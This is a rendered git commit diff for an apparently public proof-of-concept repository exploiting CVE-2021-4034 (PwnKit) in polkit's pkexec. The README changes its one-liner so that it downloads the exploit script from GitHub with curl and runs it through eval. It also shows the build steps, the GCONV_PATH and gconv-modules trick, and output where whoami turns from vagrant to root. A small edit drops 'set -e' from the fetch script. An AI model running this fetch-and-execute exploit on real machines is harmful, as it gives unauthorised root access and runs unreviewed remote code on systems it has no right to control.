Merge pull request #20 from owl4ce/patch-3
One-liner: Use `eval` for the commands
This commit is contained in:
commit
b4e5c2547e
10
README.md
10
README.md
@ -63,21 +63,23 @@ vagrant@ubuntu-impish:~/CVE-2021-4034$ echo $?
|
|||||||
|
|
||||||
Polkit (formerly PolicyKit) is a component for controlling system-wide privileges in Unix-like operating systems. It provides an organized way for non-privileged processes to communicate with privileged processes. It is also possible to use polkit to execute commands with elevated privileges using the command pkexec followed by the command intended to be executed (with root permission).
|
Polkit (formerly PolicyKit) is a component for controlling system-wide privileges in Unix-like operating systems. It provides an organized way for non-privileged processes to communicate with privileged processes. It is also possible to use polkit to execute commands with elevated privileges using the command pkexec followed by the command intended to be executed (with root permission).
|
||||||
|
|
||||||
# One command root
|
# One-liner commands
|
||||||
|
|
||||||
You can easily exploit the system using a single script, downloadable and executable with this command:
|
You can easily exploit the system using a single script, downloadable and executable with this command:
|
||||||
|
|
||||||
`( curl -s https://raw.githubusercontent.com/berdav/CVE-2021-4034/main/cve-2021-4034.sh ; cat - ) | sh`
|
```sh
|
||||||
|
eval "$(curl -s https://raw.githubusercontent.com/berdav/CVE-2021-4034/main/cve-2021-4034.sh)"
|
||||||
|
```
|
||||||
|
|
||||||
```bash
|
```bash
|
||||||
vagrant@ubuntu-impish:~/CVE-2021-4034$ whoami
|
vagrant@ubuntu-impish:~/CVE-2021-4034$ whoami
|
||||||
vagrant
|
vagrant
|
||||||
vagrant@ubuntu-impish:~/CVE-2021-4034$ ( curl -s https://raw.githubusercontent.com/berdav/CVE-2021-4034/main/cve-2021-4034.sh ; cat - ) | sh
|
vagrant@ubuntu-impish:~/CVE-2021-4034$ eval "$(curl -s https://raw.githubusercontent.com/berdav/CVE-2021-4034/main/cve-2021-4034.sh)"
|
||||||
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
|
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
|
||||||
cc -Wall cve-2021-4034.c -o cve-2021-4034
|
cc -Wall cve-2021-4034.c -o cve-2021-4034
|
||||||
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
|
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
|
||||||
mkdir -p GCONV_PATH=.
|
mkdir -p GCONV_PATH=.
|
||||||
cp /usr/bin/true GCONV_PATH=./pwnkit.so:.
|
cp -f /usr/bin/true GCONV_PATH=./pwnkit.so:.
|
||||||
whoami
|
whoami
|
||||||
root
|
root
|
||||||
```
|
```
|
||||||
|
@ -1,7 +1,5 @@
|
|||||||
#!/usr/bin/env sh
|
#!/usr/bin/env sh
|
||||||
|
|
||||||
set -e
|
|
||||||
|
|
||||||
URL='https://raw.githubusercontent.com/berdav/CVE-2021-4034/main/'
|
URL='https://raw.githubusercontent.com/berdav/CVE-2021-4034/main/'
|
||||||
|
|
||||||
for EXPLOIT in "${URL}/cve-2021-4034.c" \
|
for EXPLOIT in "${URL}/cve-2021-4034.c" \
|
||||||
|
Loading…
Reference in New Issue
Block a user